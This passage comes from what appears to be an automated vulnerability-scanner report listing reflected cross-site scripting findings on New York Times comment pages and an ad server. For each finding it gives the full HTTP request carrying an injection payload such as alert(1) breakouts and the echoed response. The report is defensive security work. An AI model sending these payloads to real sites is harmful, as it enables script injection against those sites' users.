GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300416d8%3balert(1)//ad7018bc358&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0 HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... </IMG>");var ebO = new Object();ebO.w=300416d8;alert(1)//ad7018bc358;ebO.h=250;ebO.pli=1922996;ebO.ai=4005086;ebO.ci=123305;ebO.pi=0;ebO.d=0;ebO.sms="ds.serving-sys.com/BurstingScript/";ebO.bs="bs.serving-sys.com";ebO.p="";ebO.tn="ExpBanner";ebO.hl=30;ebO.au="Site-2452 ...[SNIP]...
|
3.68. http://bs.serving-sys.com/BurstingPipe/adServer.bs [z parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://bs.serving-sys.com |
Path: |
/BurstingPipe/adServer.bs |
Issue detail
The value of the z request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de13f%3balert(1)//59f87800f7c was submitted in the z parameter. This input was echoed as de13f;alert(1)//59f87800f7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0de13f%3balert(1)//59f87800f7c HTTP/1.1 Accept: */* Referer: http://www.nytimes.com/ Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: bs.serving-sys.com Proxy-Connection: Keep-Alive Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; A2=eT709LaM0a4c0000w820rIewqR9KRX02WG0000a2wErHdQW+9KSp066N0000820wrHfhPu9MFP0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; E2=066N820wrH02WGa2wErH0a9x820wrI0a4cMc30rI0bnAMc30rM; u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; u3=1
|
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Connection: close Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" X-Powered-By: ASP.NET Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1102&RES=0&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/ Set-Cookie: A2=dQW+9KSp066N0000820wrHewqR9KRX02WG0000a2wErHeT709LaM0a4c0000w820rIfhPu9MHH0bnA0000Mc30rMduic9L7T0a9x0000820wrIeT809L8h0a4c0000g410rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: B2=7hMi0g410rI6Pim0820wrH72wu0a2wErH6EWJ0820wrI7luQ0Mc30rM7hMh0w820rI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0ujua2wErH0000001_0u6FMc30rM0000040_0nez820wrH000000g_0tdV820wrI0000001_0uXiMc30rI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0tdV01xc820wrI0uju00Z3a2wErH0uXi00Y3Mc30rI0nez002P820wrH0u6F004HMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=066N820wrH0a4cMc30rI0a9x820wrI02WGa2wErH0bnAMc30rM; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=bc24f152-c049-433d-b700-d0e64725117e3F803g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/ Vary: Accept-Encoding Content-Length: 1939
var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index ...[SNIP]... bO.plt=9;ebO.ut=gEbUT;ebO.oo=0;ebO.op=escape(ebTokens("ebLoadScript(\"ebPlayScript\",\"http://amch.questionmarket.com/adscgen/sta.php?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\")"));ebO.z=0de13f;alert(1)//59f87800f7c;ebO.pv="_3_0_3";ebBv="_4_1_7";ebO.rpv="_2_5_1";ebO.wv="_3_0_1";var ebIfrm=(""=="1");var ebSrc=ebBigS+"eb"+ebO.tn+""+ebBv+".js";document.write("<scr"+"ipt src="+ebSrc+"> ...[SNIP]...
|
3.69. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab0"><a>aee81adada6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 72749
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsaeab0"><a>aee81adada6/artsbeat.blogs.nytimes.com/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5 ...[SNIP]...
|
3.70. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb87'-alert(1)-'a3eb2ede684 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments9eb87'-alert(1)-'a3eb2ede684/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 72823
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'comments9eb87'-alert(1)-'a3eb2ede684'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.71. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d46b"><a>ee5c926c967 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/2010/11/11/anatomy-of-a-scene-unstoppable/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 33486
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com2d46b"><a>ee5c926c967/yr/mo/day/anatomy-of-a-scene-unstoppable/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bottom9,In ...[SNIP]...
|
3.72. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aadc"-alert(1)-"9102bf926e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71893
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Anatomy ...[SNIP]... ount = "nytimesglobal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142717"; var s_pagename = "2010/11/11/anatomy-of-a-scene-unstoppable/?7aadc"-alert(1)-"9102bf926e9=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.73. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc14d"><a>43c86213e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 79273
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsfc14d"><a>43c86213e2/artsbeat.blogs.nytimes.com/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro ...[SNIP]...
|
3.74. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7731'-alert(1)-'1133d4592f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsb7731'-alert(1)-'1133d4592f0/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 79339
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsb7731'-alert(1)-'1133d4592f0'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.75. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 805f0"><a>e8419ae2ec2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 34100
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com805f0"><a>e8419ae2ec2/yr/mo/day/ancient-roman-shrine-restored-reopens-to-public/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B ...[SNIP]...
|
3.76. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bd7f"-alert(1)-"eca8685c5da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1 HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:25 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 77290
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Ancient ...[SNIP]... obal,nytartsbeat"; var dcsvid = ""; var regstatus = "non-registered"; var s_prop1 = "comments"; var s_prop5 = "63_142683"; var s_pagename = "2010/11/11/ancient-roman-shrine-restored-reopens-to-public/?2bd7f"-alert(1)-"eca8685c5da=1"; var s_channel = "artsbeat"; Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" ); Tacoda_AMS_DDC_addPair( "t_section","" ); </script> ...[SNIP]...
|
3.77. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ |
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1180"><a>b75e6cb0360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71433
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsb1180"><a>b75e6cb0360/artsbeat.blogs.nytimes.com/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetp ...[SNIP]...
|
3.78. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 1]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efe6c'-alert(1)-'1c749a99567 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commentsefe6c'-alert(1)-'1c749a99567/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1 Host: community.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 200 OK Server: nginx/0.7.59 Date: Sat, 13 Nov 2010 02:01:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.2.9 Content-Length: 71521
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Grants ...[SNIP]... <script type="text/javascript" language="Javascript"> //Variables defined for the Overflow page NYTD.CRNR = window.NYTD.CRNR || {}; NYTD.CRNR.pageType = 'commentsefe6c'-alert(1)-'1c749a99567'; NYTD.CRNR.commentElement = 'submitComments'; NYTD.CRNR.bozoElement = 'bozo'; NYTD.CRNR.ratingToggle = false; NYTD.CRNR.formToggle = true; NYTD.CRNR.pageVertical = 'blogs'; </sc ...[SNIP]...
|
3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Firm |
Host: |
http://community.nytimes.com |
Path: |
/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d48e"><a>b2e8a2c3648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
